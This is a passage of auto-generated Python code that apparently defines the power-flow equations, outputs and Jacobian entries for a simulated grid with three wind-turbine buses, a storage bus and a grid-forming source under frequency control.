struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx[0,0] = -K_delta_GRID
struct[0].Fx[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy[0,22] = Omega_b_GRID
struct[0].Fy[0,28] = -Omega_b_GRID
struct[0].Fy[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy[1,27] = 1
struct[0].Fy[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy[3,28] = -1
struct[0].Gx[22,0] = K_p_GRID*(-V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gx[22,1] = K_p_GRID/T_p_GRID
struct[0].Gx[23,0] = -V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx[24,0] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx[24,2] = 1
struct[0].Gx[25,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx[26,0] = -V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx[29,3] = K_i_agc
struct[0].Gy[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
